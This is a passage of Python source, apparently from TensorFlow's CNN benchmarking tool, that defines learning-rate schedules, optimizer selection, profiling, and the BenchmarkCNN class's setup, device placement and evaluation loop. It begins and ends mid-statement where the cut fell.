int(params.num_epochs * num_examples_per_epoch + batch_size - 1) // batch_size else: num_batches = params.num_batches or _DEFAULT_NUM_BATCHES num_epochs = num_batches * batch_size / num_examples_per_epoch return (num_batches, num_epochs) def get_piecewise_learning_rate(piecewise_learning_rate_schedule, global_step, num_batches_per_epoch): """Returns a piecewise learning rate tensor. Args: piecewise_learning_rate_schedule: The --piecewise_learning_rate_schedule parameter global_step: Scalar tensor representing the global step. num_batches_per_epoch: float indicating the number of batches per epoch. 
Returns: A scalar float tensor, representing the learning rate. Raises: ValueError: piecewise_learning_rate_schedule is not formatted correctly. """ pieces = piecewise_learning_rate_schedule.split(';') if len(pieces) % 2 == 0: raise ValueError('--piecewise_learning_rate_schedule must have an odd ' 'number of components') values = [] boundaries = [] for i, piece in enumerate(pieces): if i % 2 == 0: try: values.append(float(piece)) except ValueError: raise ValueError('Invalid learning rate: ' + piece) else: try: boundaries.append(int(int(piece) * num_batches_per_epoch) - 1) except ValueError: raise ValueError('Invalid epoch: ' + piece) return tf.train.piecewise_constant(global_step, boundaries, values, name='piecewise_learning_rate') def get_learning_rate(params, global_step, num_examples_per_epoch, model, batch_size): """Returns a learning rate tensor based on global_step. Args: params: Params tuple, typically created by make_params or make_params_from_flags. global_step: Scalar tensor representing the global step. num_examples_per_epoch: The number of examples per epoch. model: The model.Model object to obtain the default learning rate from if no learning rate is specified. batch_size: Number of examples per step Returns: A scalar float tensor, representing the learning rate. When evaluated, the learning rate depends on the current value of global_step. Raises: ValueError: Invalid or unsupported params. """ with tf.name_scope('learning_rate'): num_batches_per_epoch = num_examples_per_epoch / batch_size if params.piecewise_learning_rate_schedule: if (params.init_learning_rate is not None or params.learning_rate_decay_factor or params.minimum_learning_rate or params.num_epochs_per_decay): raise ValueError('No other learning rate-related flags can be ' 'specified if --piecewise_learning_rate_schedule is ' 'specified') learning_rate = get_piecewise_learning_rate( params.piecewise_learning_rate_schedule, global_step, num_batches_per_epoch) elif params.init_learning_rate is not None: learning_rate = params.init_learning_rate if (params.num_epochs_per_decay > 0 and params.learning_rate_decay_factor > 0): decay_steps = int(num_batches_per_epoch * params.num_epochs_per_decay) # Decay the learning rate exponentially based on the number of steps. 
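# With staircase=True this evaluates to:
#   lr = init_learning_rate * learning_rate_decay_factor ** floor(global_step / decay_steps)
# Illustrative numbers (not defaults): init_learning_rate=0.1, learning_rate_decay_factor=0.1
# and num_epochs_per_decay=30 keep the rate at 0.1 for the first 30 epochs, 0.01 for the
# next 30, and so on.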
learning_rate = tf.train.exponential_decay( params.init_learning_rate, global_step, decay_steps, params.learning_rate_decay_factor, staircase=True) if params.minimum_learning_rate != 0.: learning_rate = tf.maximum(learning_rate, params.minimum_learning_rate) else: learning_rate = model.get_learning_rate(global_step, batch_size) if params.num_learning_rate_warmup_epochs > 0 and ( params.init_learning_rate is not None or params.piecewise_learning_rate_schedule): warmup_steps = int(num_batches_per_epoch * params.num_learning_rate_warmup_epochs) init_lr = params.init_learning_rate if init_lr is None: init_lr = float(params.piecewise_learning_rate_schedule.split(';')[0]) warmup_lr = init_lr * tf.cast(global_step, tf.float32) / tf.cast( warmup_steps, tf.float32) learning_rate = tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: learning_rate) learning_rate = mlperf.logger.log_deferred_tensor_value( mlperf.tags.OPT_LR, learning_rate, global_step, every_n=100) return learning_rate def get_optimizer(params, learning_rate): """Returns the optimizer that should be used based on params.""" if params.optimizer == 'momentum': mlperf.logger.log(key=mlperf.tags.OPT_NAME, value=mlperf.tags.SGD_WITH_MOMENTUM) mlperf.logger.log(key=mlperf.tags.OPT_MOMENTUM, value=params.momentum) opt = tf.train.MomentumOptimizer( learning_rate, params.momentum, use_nesterov=True) elif params.optimizer == 'sgd': mlperf.logger.log(key=mlperf.tags.OPT_NAME, value=mlperf.tags.SGD) opt = tf.train.GradientDescentOptimizer(learning_rate) elif params.optimizer == 'rmsprop': opt = tf.train.RMSPropOptimizer( learning_rate, params.rmsprop_decay, momentum=params.rmsprop_momentum, epsilon=params.rmsprop_epsilon) elif params.optimizer == 'adam': opt = tf.train.AdamOptimizer(learning_rate, params.adam_beta1, params.adam_beta2, params.adam_epsilon) else: raise ValueError('Optimizer "{}" was not recognized'. format(params.optimizer)) return opt def generate_tfprof_profile(profiler, tfprof_file): """Generates a tfprof profile, writing it to a file and printing top ops. Args: profiler: A tf.profiler.Profiler. `profiler.add_step` must have already been called. tfprof_file: The filename to write the ProfileProto to. """ profile_proto = profiler.serialize_to_string() log_fn('Dumping ProfileProto to %s' % tfprof_file) with gfile.Open(tfprof_file, 'wb') as f: f.write(profile_proto) # Print out the execution times of the top operations. Note this # information can also be obtained with the dumped ProfileProto, but # printing it means tfprof doesn't have to be used if all the user wants # is the top ops. options = tf.profiler.ProfileOptionBuilder.time_and_memory() options['max_depth'] = _NUM_OPS_TO_PRINT options['order_by'] = 'accelerator_micros' profiler.profile_operations(options) class BenchmarkCNN(object): """Class for benchmarking a cnn network.""" def __init__(self, params, dataset=None, model=None): """Initialize BenchmarkCNN. Args: params: Params tuple, typically created by make_params or make_params_from_flags. dataset: If not None, the dataset to use. Otherwise, params is used to obtain the dataset. model: If not None, the model to use. Otherwise, params is used to obtain the model. Raises: ValueError: Unsupported params settings. """ mlperf.logger.log(key=mlperf.tags.RUN_START) self.params = params if params.eval: self._doing_eval = True else: # Note self._doing_eval can later switch to True in self._do_eval() if # self.params.eval_during_training_* is specified. 
self._doing_eval = False self.dataset = dataset or datasets.create_dataset(self.params.data_dir, self.params.data_name) self.model = model or model_config.get_model_config( self.params.model, self.dataset, self.params) self.trace_filename = self.params.trace_file self.rewriter_config = self.params.rewriter_config autotune_threshold = self.params.autotune_threshold if ( self.params.autotune_threshold) else 1 min_autotune_warmup = 5 * autotune_threshold * autotune_threshold self.num_warmup_batches = self.params.num_warmup_batches if ( self.params.num_warmup_batches is not None) else max( 10, min_autotune_warmup) self.graph_file = self.params.graph_file self.resize_method = self.params.resize_method self.sync_queue_counter = 0 self.num_gpus = self.params.num_gpus if self.params.gpu_indices: self.gpu_indices = [int(x) for x in self.params.gpu_indices.split(',')] else: self.gpu_indices = [x for x in range(self.num_gpus)] if (self.params.device == 'cpu' and self.params.data_format == 'NCHW' and not self.params.mkl): raise ValueError('device=cpu requires that data_format=NHWC') if ((self.params.num_epochs_per_decay or self.params.learning_rate_decay_factor) and not (self.params.init_learning_rate is not None and self.params.num_epochs_per_decay and self.params.learning_rate_decay_factor)): raise ValueError('If one of num_epochs_per_decay or ' 'learning_rate_decay_factor is set, both must be set' 'and learning_rate must be set') if (self.params.minimum_learning_rate and not (self.params.init_learning_rate is not None and self.params.num_epochs_per_decay and self.params.learning_rate_decay_factor)): raise ValueError('minimum_learning_rate requires learning_rate,' 'num_epochs_per_decay, and ' 'learning_rate_decay_factor to be set') if (self.params.use_fp16 and self.params.fp16_vars and 'replicated' in self.params.variable_update and self.params.all_reduce_spec and 'nccl' in self.params.all_reduce_spec): raise ValueError('fp16 variables are not supported with NCCL') if (self.params.use_fp16 and self.params.fp16_vars and self.params.gradient_repacking): raise ValueError('--fp16_vars cannot be used with --gradient_repacking') if self.params.variable_update == 'horovod' and self.params.num_gpus > 1: raise ValueError('Horovod benchmarks require num_gpus=1 on each worker') if self.params.variable_update == 'horovod' and self.params.job_name: raise ValueError('job_name should not be specified for Horovod.') if self.params.use_fp16 and self.params.fp16_enable_auto_loss_scale: if self.params.all_reduce_spec and 'nccl' in self.params.all_reduce_spec: raise ValueError('Automatic loss scaling is not supported with NCCL.') if self.params.variable_update not in ('parameter_server', 'replicated', 'independent'): raise ValueError('Automatic loss scaling is not supported with ' 'variable_update=%s.' 
% self.params.variable_update) if self.params.staged_vars: raise ValueError('Automatic loss scaling is not supported with' 'staged_vars.') if (self.params.debugger is not None and self.params.debugger != 'cli' and ':' not in self.params.debugger): raise ValueError('--debugger must be "cli" or in the form ' 'host:port') if self.params.hierarchical_copy and self.params.num_gpus <= 1: raise ValueError('--hierarchical_copy requires --num_gpus to be greater ' 'than 1') if params.save_model_secs and params.save_model_steps: raise ValueError('At most one of --save_model_secs and ' '--save_model_steps can be specified') eval_during_training_flags = list(map(bool, [ params.eval_during_training_every_n_steps, params.eval_during_training_every_n_epochs, params.eval_during_training_at_specified_steps, params.eval_during_training_at_specified_epochs, ])) if eval_during_training_flags.count(True) > 1: raise ValueError('At most one flag with --eval_during_training_* prefix ' 'must be specified.') eval_during_training_enabled = any(eval_during_training_flags) if eval_during_training_enabled: if params.eval: raise ValueError('At most one of --eval and --eval_during_training_* ' 'must be specified') if params.forward_only: raise ValueError('At most one of --forward_only and ' '--eval_during_training_* must be specified') if params.job_name: raise ValueError('--eval_during_training_* is not yet supported in ' 'distributed mode.') if params.staged_vars: raise ValueError('--eval_during_training_* is not currently compatible ' 'with --staged_vars') if params.stop_at_top_1_accuracy and not eval_during_training_enabled: raise ValueError('--stop_at_top_1_accuracy is only supported with ' '--eval_during_training_*') if params.collect_eval_results_async and params.model != 'ssd300': raise ValueError('--collect_eval_results_async only works with ssd300 ' 'model currently.') if self.params.forward_only and self.params.freeze_when_forward_only: if self.params.train_dir is not None: raise ValueError('In forward_only mode, when --freeze_when_forward_only' ' is True, --train_dir should not be specified') if self.params.data_dir and not self.params.datasets_use_prefetch: raise ValueError('In forward_only mode, when --freeze_when_forward_only' ' is True and --data_dir is set, ' '--datasets_use_prefetch should be set to True') if self.params.job_name: raise ValueError('In forward_only mode, when --freeze_when_forward_only' ' is True, --job_name should not be specified and ' 'distributed running is not supported') self.forward_only_and_freeze = True else: self.forward_only_and_freeze = False if self.params.trt_mode: raise ValueError('--trt_mode should not be specified if one of ' '--forward_only and --freeze_when_forward_only is set ' 'to False') self.mode = get_mode_from_params(self.params) # Use the batch size from the command line if specified, otherwise use the # model's default batch size. Scale the benchmark's batch size by the # number of GPUs. 
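# Illustrative numbers: --batch_size=64 with --num_gpus=4 gives a per-device batch of 64
# and a per-worker self.batch_size of 256; when --batch_size is not set to a positive
# value, the model's own default batch size is used instead.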
if self.params.batch_size > 0: self.model.set_batch_size(self.params.batch_size) self.batch_size = self.model.get_batch_size() * self.num_gpus if self.mode in (constants.BenchmarkMode.TRAIN, constants.BenchmarkMode.TRAIN_AND_EVAL): self.train_batch_size = self.batch_size else: self.train_batch_size = None if self.mode in (constants.BenchmarkMode.EVAL, constants.BenchmarkMode.TRAIN_AND_EVAL): if self.params.eval_batch_size > 0: self.eval_batch_size = self.params.eval_batch_size * self.num_gpus else: self.eval_batch_size = self.batch_size else: self.eval_batch_size = None self.batch_group_size = self.params.batch_group_size self.enable_auto_loss_scale = ( self.params.use_fp16 and self.params.fp16_enable_auto_loss_scale) self.loss_scale = None self.loss_scale_normal_steps = None self.job_name = self.params.job_name # "" for local training # PS server is used for distributed jobs not using all-reduce. use_ps_server = self.job_name and (self.params.variable_update != 'distributed_all_reduce' and self.params.variable_update != 'collective_all_reduce') # controller is used for distributed_all_reduce with > 1 worker. use_controller = ( self.params.variable_update == 'distributed_all_reduce' and self.job_name) if use_controller and not params.controller_host: raise ValueError('When variable_update==distributed_all_reduce ' 'controller_host must also be specified.') # collective_all_reduce doesn't need a controller or ps self.distributed_collective = ( self.params.variable_update == 'collective_all_reduce' and self.job_name) self.local_parameter_device_flag = self.params.local_parameter_device if self.job_name: self.task_index = self.params.task_index self.cluster_manager = platforms_util.get_cluster_manager( params, create_config_proto(params)) assert isinstance(self.cluster_manager, cnn_util.BaseClusterManager) worker_prefix = '/job:worker/replica:0/task:%s' % self.task_index if use_ps_server: self.param_server_device = tf.train.replica_device_setter( worker_device=worker_prefix + '/cpu:0', cluster=self.cluster_manager.get_cluster_spec()) # This device on which the queues for managing synchronization between # servers should be stored. self.sync_queue_devices = [ '/job:ps/replica:0/task:%s/cpu:0' % i for i in range(self.cluster_manager.num_ps()) ] else: self.sync_queue_devices = ['/job:worker/replica:0/task:0/cpu:0'] else: self.task_index = 0 self.cluster_manager = None worker_prefix = '' self.param_server_device = '/%s:0' % self.params.local_parameter_device self.sync_queue_devices = [self.param_server_device] if self.cluster_manager: self.num_workers = self.cluster_manager.num_workers() elif self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top self.num_workers = hvd.size() else: self.num_workers = 1 self.num_ps = self.cluster_manager.num_ps() if self.cluster_manager else 0 if self.num_workers > 1 and self.params.all_reduce_spec == 'nccl': raise ValueError('--all_reduce_spec=nccl is invalid in a ' 'multi-worker job') # Device to use for ops that need to always run on the local worker's CPU. self.cpu_device = '%s/cpu:0' % worker_prefix # Device to use for ops that need to always run on the local worker's # compute device, and never on a parameter server device. 
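# For example, a local 2-GPU run has worker_prefix == '' and yields ['/gpu:0', '/gpu:1'];
# in distributed mode the entries look like '/job:worker/replica:0/task:0/gpu:0'.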
self.raw_devices = [ '%s/%s:%i' % (worker_prefix, self.params.device, i) for i in xrange(self.num_gpus) ] subset = 'validation' if params.eval else 'train' self.num_batches, self.num_epochs = get_num_batches_and_epochs( params, self.batch_size * self.num_workers, self.dataset.num_examples_per_epoch(subset)) if self.mode in (constants.BenchmarkMode.EVAL, constants.BenchmarkMode.TRAIN_AND_EVAL): # TODO(reedwm): Currently we do extra eval logic for num_eval_batches and # the preprocessor. We should encapsulate this logic into a shared # function or class. if params.num_eval_batches is None and params.num_eval_epochs is None: eval_params = self.params else: eval_params = self.params._replace( num_batches=self.params.num_eval_batches, num_epochs=self.params.num_eval_epochs) self.num_eval_batches, self.num_eval_epochs = get_num_batches_and_epochs( eval_params, self.eval_batch_size * self.num_workers, self.dataset.num_examples_per_epoch('validation')) else: self.num_eval_batches, self.num_eval_epochs = None, None num_train_examples_per_epoch = self.dataset.num_examples_per_epoch('train') if self.params.eval_during_training_every_n_epochs: n_epochs = self.params.eval_during_training_every_n_epochs self.eval_during_training_at_specified_steps = { (int(e * num_train_examples_per_epoch + self.batch_size - 1) // self.batch_size) for e in np.arange(n_epochs, self.num_epochs, n_epochs)} if self.params.eval_during_training_at_specified_steps: try: self.eval_during_training_at_specified_steps = set(map( int, self.params.eval_during_training_at_specified_steps)) except ValueError: raise ValueError('Param eval_during_training_at_specified_steps value ' 'of %s cannot be converted to a list of integers.' % (self.params.eval_during_training_at_specified_steps)) if self.params.eval_during_training_at_specified_epochs: try: n_epochs = list(map( float, self.params.eval_during_training_at_specified_epochs)) offset = n_epochs[0] - 1 if offset.is_integer(): offset = int(offset) mlperf.logger.log(key=mlperf.tags.EVAL_EPOCH_OFFSET, value=offset) self.eval_during_training_at_specified_steps = { (int(e * num_train_examples_per_epoch + self.batch_size - 1) // self.batch_size) for e in n_epochs} except ValueError: raise ValueError('Param eval_during_training_at_specified_epochs value ' 'of %s cannot be converted to a list of floats.' 
% (self.params.eval_during_training_at_specified_epochs)) if params.eval_during_training_every_n_epochs: offset = params.eval_during_training_every_n_epochs - 1 if offset.is_integer(): offset = int(offset) mlperf.logger.log(key=mlperf.tags.EVAL_EPOCH_OFFSET, value=offset) if (self.params.staged_vars and self.params.variable_update != 'parameter_server'): raise ValueError('staged_vars for now is only supported with ' 'variable_update=parameter_server') if self.params.variable_update == 'parameter_server': if self.job_name: if not self.params.staged_vars: self.variable_mgr = variable_mgr.VariableMgrDistributedFetchFromPS( self) else: self.variable_mgr = ( variable_mgr.VariableMgrDistributedFetchFromStagedPS(self)) else: if not self.params.staged_vars: self.variable_mgr = variable_mgr.VariableMgrLocalFetchFromPS(self) else: self.variable_mgr = variable_mgr.VariableMgrLocalFetchFromStagedPS( self) elif self.params.variable_update == 'replicated': if self.job_name: raise ValueError('Invalid variable_update in distributed mode: %s' % self.params.variable_update) self.variable_mgr = variable_mgr.VariableMgrLocalReplicated( self, self.params.all_reduce_spec, self.params.agg_small_grads_max_bytes, self.params.agg_small_grads_max_group, self.params.allreduce_merge_scope) elif self.params.variable_update == 'distributed_all_reduce': assert self.params.cross_replica_sync self.variable_mgr = variable_mgr.VariableMgrDistributedAllReduce( self, self.params.all_reduce_spec, ('worker' if self.num_workers > 1 else 'localhost'), self.num_workers, self.params.agg_small_grads_max_bytes, self.params.agg_small_grads_max_group, self.params.allreduce_merge_scope) elif self.params.variable_update == 'collective_all_reduce': assert self.params.cross_replica_sync self.variable_mgr = variable_mgr.VariableMgrCollectiveAllReduce( self, self.params.all_reduce_spec, self.num_workers, self.num_gpus, self.task_index, self.params.allreduce_merge_scope) elif self.params.variable_update == 'distributed_replicated': assert self.params.cross_replica_sync if not self.job_name: raise ValueError('Invalid variable_update in local mode: %s' % self.params.variable_update) self.variable_mgr = variable_mgr.VariableMgrDistributedReplicated(self) elif self.params.variable_update in ('independent', 'horovod'): if self.job_name: raise ValueError('Invalid variable_update in distributed mode: %s' % self.params.variable_update) self.variable_mgr = variable_mgr.VariableMgrIndependent(self) else: raise ValueError( 'Invalid variable_update: %s' % self.params.variable_update) # Device to use for running on the local worker's compute device, but # with variables assigned to parameter server devices. 
self.devices = self.variable_mgr.get_devices() if self.job_name: if use_ps_server: self.global_step_device = self.param_server_device elif self.params.variable_update == 'collective_all_reduce': self.global_step_device = self.cpu_device else: self.global_step_device = '/job:worker/replica:0/task:0/cpu:0' else: self.global_step_device = self.cpu_device self.input_preprocessor = None self.eval_input_preprocessor = None if not self.dataset.use_synthetic_gpu_inputs(): if not self.params.eval: self.input_preprocessor = self.get_input_preprocessor() if self.mode in (constants.BenchmarkMode.EVAL, constants.BenchmarkMode.TRAIN_AND_EVAL): with self._do_eval(): self.eval_input_preprocessor = self.get_input_preprocessor() self.datasets_use_prefetch = ( self.params.datasets_use_prefetch and # TODO(rohanj): Figure out why --datasets_use_prefetch freezes on the # CPU. self.params.device.lower() != 'cpu' and self.input_preprocessor and self.input_preprocessor.supports_datasets()) self.init_global_step = 0 self._config_benchmark_logger() if self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL: # Remove "eval" from params so it is not accidentally used. Since eval can # still occur despite params.eval being False, params.eval should never # be used. We cannot yet remove this unconditionally, because the SSD # model still uses params.eval, and hence does not work properly with # --eval_during_training_*. # TODO(b/116627045): We should also remove fields that have an eval # equivalent, like num_batches and num_eval_batches. self.params = remove_param_fields(self.params, {'eval'}) @contextlib.contextmanager def _do_eval(self): """Context manager to switches BenchmarkCNN to eval mode. Any evaluation code should be put under this context manager. This context manager switches self._doing_eval to True. It also switches certain attributes, like self.num_batches and self.num_epochs, to be the number of batches and epochs for evaluation respectively Yields: Nothing. """ # TODO(b/116627045): Find a more general way of switching attributes to the # eval equivalents. old_doing_eval = self._doing_eval old_num_batches = self.num_batches old_num_epochs = self.num_epochs old_batch_size = self.batch_size try: self._doing_eval = True self.num_batches = self.num_eval_batches self.num_epochs = self.num_eval_epochs self.batch_size = self.eval_batch_size self.model.set_batch_size(self.eval_batch_size // self.num_gpus) yield finally: self._doing_eval = old_doing_eval self.num_batches = old_num_batches self.num_epochs = old_num_epochs self.batch_size = old_batch_size self.model.set_batch_size(old_batch_size // self.num_gpus) def _config_benchmark_logger(self): """Config the model garden benchmark logger.""" model_benchmark_logger = None if self.params.benchmark_log_dir is not None: try: from official.utils.logs import logger as models_logger # pylint: disable=g-import-not-at-top except ImportError: tf.logging.fatal('Please include tensorflow/models to the PYTHONPATH ' 'in order to use BenchmarkLogger. Configured ' 'benchmark_log_dir: %s' % self.params.benchmark_log_dir) raise model_benchmark_logger = models_logger.BenchmarkFileLogger( self.params.benchmark_log_dir) self.benchmark_logger = model_benchmark_logger # TODO(laigd): this changes the global device list which is used everywhere, # consider refactoring it. 
def reset_devices_for_task(self, task_num, is_local=False): """Used to imitate another task when building a distributed graph.""" worker_prefix = ('/job:localhost' if is_local else '/job:worker/replica:0/task:%s' % task_num) self.cpu_device = '%s/cpu:0' % worker_prefix self.raw_devices = [ '%s/%s:%i' % (worker_prefix, self.params.device, i) for i in xrange(self.num_gpus) ] self.devices = self.variable_mgr.get_devices() def raw_devices_across_tasks(self, is_local=False): """Returns list of raw device names across all tasks.""" if is_local: assert self.num_workers == 1 return self.raw_devices else: return [ 'job:worker/replica:0/task%s/%s:%i' % (t, self.params.device, i) for t in xrange(self.num_workers) for i in xrange(self.num_gpus) ] def print_info(self): """Print basic information.""" benchmark_info = self._get_params_info() log_fn('Model: %s' % self.model.get_model_name()) log_fn('Dataset: %s' % benchmark_info['dataset_name']) log_fn('Mode: %s' % self.mode) log_fn('SingleSess: %s' % benchmark_info['single_session']) log_fn('Batch size: %s global' % (self.batch_size * self.num_workers)) log_fn(' %s per device' % (self.batch_size // len(self.raw_devices))) if self.batch_group_size > 1: log_fn(' %d batches per preprocessing group' % self.batch_group_size) log_fn('Num batches: %d' % self.num_batches) log_fn('Num epochs: %.2f' % self.num_epochs) log_fn('Devices: %s' % benchmark_info['device_list']) log_fn('Data format: %s' % self.params.data_format) if self.rewriter_config: log_fn('RewriterConfig: %s' % self.rewriter_config) log_fn('Optimizer: %s' % self.params.optimizer) log_fn('Variables: %s' % self.params.variable_update) if (self.params.variable_update == 'replicated' or self.params.variable_update == 'distributed_all_reduce' or self.params.variable_update == 'collective_all_reduce'): log_fn('AllReduce: %s' % self.params.all_reduce_spec) if self.job_name: log_fn('Sync: %s' % self.params.cross_replica_sync) if self.params.staged_vars: log_fn('Staged vars: %s' % self.params.staged_vars) if self.params.variable_update == 'horovod' and self.params.horovod_device: log_fn('Horovod on: %s' % self.params.horovod_device) log_fn('==========') def _get_params_info(self): """Get the common parameters info for the benchmark run. Returns: A dict of processed parameters. """ dataset_name = self.dataset.name if self.dataset.use_synthetic_gpu_inputs(): dataset_name += ' (synthetic)' single_session = self.params.variable_update == 'distributed_all_reduce' if single_session: device_list = self.raw_devices_across_tasks() elif self.params.variable_update == 'horovod': device_list = ['horovod/%s:%d' % (self.params.device, idx) for idx in range(self.num_workers)] else: device_list = self.raw_devices return { 'dataset_name': dataset_name, 'single_session': single_session, 'device_list': device_list,} def _log_benchmark_run(self): """Log the benchmark info to the logger. The info logged here should be similar to print_info(), but in a structured JSON format. 
""" if self.benchmark_logger: benchmark_info = self._get_params_info() run_param = { 'model': self.model.get_model_name(), 'dataset': benchmark_info['dataset_name'], 'mode': self.mode, 'single_sess': benchmark_info['single_session'], 'devices': benchmark_info['device_list'], 'batch_size': self.batch_size, 'batch_size_per_device': self.batch_size // len(self.raw_devices), 'num_batches': self.num_batches, 'num_epochs': self.num_epochs, 'data_format': self.params.data_format, 'rewrite_config': self.rewriter_config, 'optimizer': self.params.optimizer, 'session_config': create_config_proto(self.params), } # TODO(scottzhu): tf_cnn_benchmark might execute several times with # different param setting on the same box. This will cause the run file to # only contain the latest info. The benchmark_log_dir should be updated # for every new run. self.benchmark_logger.log_run_info( self.model.get_model_name(), benchmark_info['dataset_name'], run_param, test_id=self.params.benchmark_test_id) def run(self): """Run the benchmark task assigned to this process. Returns: Dictionary of statistics for training or eval. Raises: ValueError: unrecognized job name. """ if self.params.job_name == 'ps': log_fn('Running parameter server %s' % self.task_index) self.cluster_manager.join_server() return {} # For distributed_all_reduce with multiple workers, drive # from a separate controller process. if self.params.variable_update == 'distributed_all_reduce': if self.params.job_name == 'worker': log_fn('Starting worker %s' % self.task_index) self.cluster_manager.join_server() return elif self.params.job_name and self.params.job_name != 'controller': raise ValueError('unrecognized job name: %s' % self.params.job_name) self._log_benchmark_run() log_fn('start:' + str(datetime.datetime.now())) if self._doing_eval: with tf.Graph().as_default(): # TODO(laigd): freeze the graph in eval mode. result = self._run_eval() else: result = self._benchmark_train() log_fn('end:' + str(datetime.datetime.now())) return result def _run_eval(self): """Evaluate a model every self.params.eval_interval_secs. Returns: Dictionary containing eval statistics. Currently returns an empty dictionary. Raises: ValueError: If self.params.train_dir is unspecified. """ if self.params.train_dir is None: raise ValueError('Trained model directory not specified') graph_info = self._build_eval_graph() saver = tf.train.Saver(self.variable_mgr.savable_variables()) summary_writer = tf.summary.FileWriter(self.params.eval_dir, tf.get_default_graph()) target = '' # TODO(huangyp): Check if checkpoints haven't updated for hours and abort. while True: with tf.Session( target=target, config=create_config_proto(self.params)) as sess: image_producer = None try: global_step = load_checkpoint(saver, sess, self.params.train_dir) image_producer = self._initialize_eval_graph( graph_info.enqueue_ops, graph_info.input_producer_op, graph_info.local_var_init_op_group, sess) except CheckpointNotFoundException: log_fn('Checkpoint not found in %s' % self.params.train_dir) else: # Only executes if an exception was not thrown self._eval_once(sess, summary_writer, graph_info.fetches, graph_info.summary_op, image_producer, global_step) if image_producer is not None: image_producer.done() if self.params.eval_interval_secs <= 0: break time.sleep(self.params.eval_interval_secs) return {} def _build_eval_graph(self, scope_name=None): """Build the evaluation graph. Args: scope_name: String to filter what summaries are collected. 
Only summary ops whose name contains `scope_name` will be added, which is useful for only including evaluation ops. Returns: A GraphInfo named_tuple containing various useful ops and tensors of the evaluation graph. """ with self._do_eval(): input_producer_op, enqueue_ops, fetches = self._build_model() local_var_init_op = tf.local_variables_initializer() table_init_ops = tf.tables_initializer() variable_mgr_init_ops = [local_var_init_op] if table_init_ops: variable_mgr_init_ops.extend([table_init_ops]) with tf.control_dependencies([local_var_init_op]): variable_mgr_init_ops.extend(self.variable_mgr.get_post_init_ops()) local_var_init_op_group = tf.group(*variable_mgr_init_ops) summary_op = tf.summary.merge_all(scope=scope_name) # The eval graph has no execution barrier because it doesn't run in # distributed mode. execution_barrier = None # We do not use the global step during evaluation. global_step = None return GraphInfo(input_producer_op, enqueue_ops, fetches, execution_barrier, global_step, local_var_init_op_group, summary_op) # TODO(reedwm): For consistency, we should have a similar # "_initialize_train_graph" function. They can likely be the same function. def _initialize_eval_graph(self, enqueue_ops, input_producer_op, local_var_init_op_group, sess): """Initializes the evaluation graph. Args: enqueue_ops: Ops that add the preprocessed images to the staging areas. input_producer_op: Op that produces the input batches (before preprocessing). local_var_init_op_group: Group of ops that perform per-device initialization work. sess: The session to initialize the eval graph with. Returns: An ImageProducer, or None if an ImageProducer isn't being used. """ with self._do_eval(): if local_var_init_op_group is not None: # We might reinitialize local variables if they were already initialized # during training. This is OK. sess.run(local_var_init_op_group) if self.dataset.queue_runner_required(): tf.train.start_queue_runners(sess=sess) image_producer = None if input_producer_op is not None: image_producer = cnn_util.ImageProducer( sess, input_producer_op, self.batch_group_size, self.params.use_python32_barrier) image_producer.start() if enqueue_ops: for i in xrange(len(enqueue_ops)): sess.run(enqueue_ops[:(i + 1)]) if image_producer is not None: image_producer.notify_image_consumption() return image_producer def _eval_once(self, sess, summary_writer, fetches, summary_op, image_producer, global_step): """Evaluate the model using the validation dataset.""" with self._do_eval(): mlperf.logger.log_eval_epoch( mlperf.tags.EVAL_START, global_step, self.batch_size) loop_start_time = start_time = time.time() # TODO(laigd): refactor the part to compute/report the accuracy. Currently # it only works for image models. top_1_accuracy_sum = 0.0 top_5_accuracy_sum = 0.0 total_eval_count = self.num_batches * self.batch_size for step in xrange(self.num_batches): if (summary_writer and self.params.save_summaries_steps > 0 and (step + 1) % self.params.save_summaries_steps == 0): results, summary_str = sess.run([fetches, summary_op]) summary_writer.add_summary(summary_str) else: results = sess.run(fetches) # Make global_step available in results for postprocessing. 
results['global_step'] = global_step results = self.model.postprocess(results) top_1_accuracy_sum += results['top_1_accuracy'] top_5_accuracy_sum += results['top_5_accuracy'] if (step + 1) % self.params.display_every == 0: duration = time.time() - start_time examples_per_sec = ( self.batch_size * self.params.display_every / duration) log_fn('%i\t%.1f examples/sec' % (step + 1, examples_per_sec)) start_time = time.time() if image_producer is not None: image_producer.notify_image_consumption() loop_end_time = time.time() accuracy_at_1 = top_1_accuracy_sum / self.num_batches accuracy_at_5 = top_5_accuracy_sum / self.num_batches summary = tf.Summary() summary.value.add(tag='eval/Accuracy@1', simple_value=accuracy_at_1) summary.value.add(tag='eval/Accuracy@5', simple_value=accuracy_at_5) for result_key, result_value in results.items(): if result_key.startswith(constants.SIMPLE_VALUE_RESULT_PREFIX): prefix_len = len(constants.SIMPLE_VALUE_RESULT_PREFIX) summary.value.add(tag='eval/' + result_key[prefix_len:], simple_value=result_value) if summary_writer: summary_writer.add_summary(summary, global_step) log_fn('Accuracy @ 1 = %.4f Accuracy @ 5 = %.4f [%d examples]' % (accuracy_at_1, accuracy_at_5, total_eval_count)) elapsed_time = loop_end_time - loop_start_time images_per_sec = (self.num_batches * self.batch_size / elapsed_time) if self.mode != constants.BenchmarkMode.TRAIN_AND_EVAL: # Note that we compute the top 1 accuracy and top 5 accuracy for each # batch, which will have a slight performance impact. log_fn('-' * 64) log_fn('total images/sec: %.2f' % images_per_sec) log_fn('-' * 64) if self.benchmark_logger: eval_result = { 'eval_top_1_accuracy': accuracy_at_1, 'eval_top_5_accuracy': accuracy_at_5, 'eval_average_examples_per_sec': images_per_sec, tf.GraphKeys.GLOBAL_STEP: global_step, } self.benchmark_logger.log_evaluation_result(eval_result) mlperf.logger.log_eval_epoch( mlperf.tags.EVAL_STOP, global_step, self.batch_size) mlperf.logger.log(key=mlperf.tags.EVAL_SIZE, value=self.num_batches * self.batch_size) if self.params.model != 'ssd300': # ssd300 logs eval accuracy elsewhere. mlperf.logger.log_eval_accuracy( accuracy_at_1, global_step, self.train_batch_size, examples_per_epoch=self.dataset.num_examples_per_epoch('train')) if self.params.stop_at_top_1_accuracy: mlperf.logger.log(key=mlperf.tags.EVAL_TARGET, value=self.params.stop_at_top_1_accuracy) return accuracy_at_1, accuracy_at_5 def _benchmark_train(self): """Run cnn in benchmark mode. Skip the backward pass if forward_only is on. Returns: Dictionary containing training statistics (num_workers, num_steps, average_wall_time, images_per_sec). """ graph = tf.Graph() with graph.as_default(): build_result = self._build_graph() if self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL: with self.variable_mgr.reuse_variables(): with tf.name_scope('Evaluation') as ns: eval_build_results = 